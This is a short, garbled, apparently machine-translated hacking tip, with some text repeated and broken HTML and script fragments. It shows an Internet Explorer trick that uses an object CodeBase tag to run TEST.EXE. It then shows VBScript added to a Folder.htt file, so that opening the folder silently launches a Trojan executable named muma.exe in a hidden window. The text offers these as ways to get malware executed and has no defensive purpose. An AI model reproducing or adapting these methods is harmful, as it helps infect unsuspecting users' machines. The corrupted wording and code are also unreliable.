The previous code is
Run_exe = " Run_exe = "CodeBase = /" TEST.EXE # Version = 1, 1, 1, 1 / ">" RUN_EXE = "" Run_exe = " object>" Document.open (); Document.clear (); Document.writeln (Run_exe); Document.close (); script> It is used to use IE vulnerabilities, but a lot of IE is more upgraded. No use: We can also use VBS to achieve this: In front of the Folder.htt file:
Run_exe = "CodeBase = /" TEST.EXE # Version = 1, 1, 1, 1 / ">"
RUN_EXE = ""
Run_exe = " object>"
Document.open ();
Document.clear ();
Document.writeln (Run_exe);
Document.close ();
script>
It is used to use IE vulnerabilities, but a lot of IE is more upgraded. No use:
We can also use VBS to achieve this:
In front of the Folder.htt file:
Add VBS code at the end:
Function MUMA ()
SET WSH = CreateObject ("wscript.shell")
Wsh.Run "c: /winnt/system32/muma.exe", 0
END FUNCTION